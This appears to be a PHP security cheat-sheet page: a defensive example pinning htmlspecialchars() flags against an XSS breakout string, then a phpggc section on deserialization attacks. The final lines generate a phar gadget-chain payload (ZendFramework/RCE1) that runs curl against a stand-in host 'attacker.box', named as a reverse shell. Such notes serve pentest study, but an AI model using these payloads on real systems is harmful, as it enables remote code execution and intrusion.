PHP

Online PHP runner with various PHP versions

https://onlinephp.io/

Dangerous functions

htmlspecialchars

htmlspecialchars — Convert special characters to HTML entities
Ref: https://www.php.net/manual/en/function.htmlspecialchars.php

Depending on the PHP version, the default flags may differ and not encode all characters. For example, ' (single quote) is not converted by default in all PHP versions:

HTML special chars demo with PHP v7.4.33 vs PHP v8.2.20
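Added example (not code from the original page): instead of relying on the version-dependent default, pin the flags so single quotes are always encoded. The input string is constructed for the demo.

```php
<?php
// Added example: pin htmlspecialchars() flags instead of trusting the default.
// PHP < 8.1 defaults to ENT_COMPAT | ENT_HTML401, which leaves ' untouched;
// PHP 8.1+ defaults to ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401.

// Version-independent escaper for text nodes and quoted attribute values.
function escape_html(string $value): string
{
    // ENT_QUOTES: encode both " and '
    // ENT_SUBSTITUTE: replace invalid UTF-8 instead of returning ""
    // ENT_HTML5: ' becomes &apos; (ENT_HTML401 would give &#039;)
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Returns true if the running PHP's *default* call already encodes '.
function default_encodes_single_quote(): bool
{
    return htmlspecialchars("'") !== "'";
}

// Constructed sample: a value that would break out of a single-quoted attribute.
$input = "x' onmouseover='alert(1)";

$defaultEscaped = htmlspecialchars($input); // result depends on PHP version
$pinnedEscaped  = escape_html($input);       // identical on every version

printf("PHP %s, default encodes ': %s\n", PHP_VERSION,
    default_encodes_single_quote() ? 'yes' : 'no');
printf("default: %s\n", $defaultEscaped);
printf("pinned : %s\n", $pinnedEscaped);

// With pinned flags no raw single quote can survive.
assert(strpos($pinnedEscaped, "'") === false);

// Only the pinned form is safe inside a single-quoted attribute.
echo "<a title='" . $pinnedEscaped . "'>link</a>\n";
```

Run it on the online runner above with 7.4.33 and 8.2.20 to see the default output change while the pinned output stays the same.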

Deserialization with phpggc

PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.

If you need to find the libraries used by the application, look for composer.json or composer.lock.

# show list of gadget chains
./phpggc -l

# deserialization via phar file
# (phar doesn't care about the extension)
# ZendFramework/RCE1 gadget selected here, but can be anything that supports __destruct or __wakeup vector
./phpggc -p phar -o /tmp/revshell.anything ZendFramework/RCE1 system "curl http://attacker.box/phar"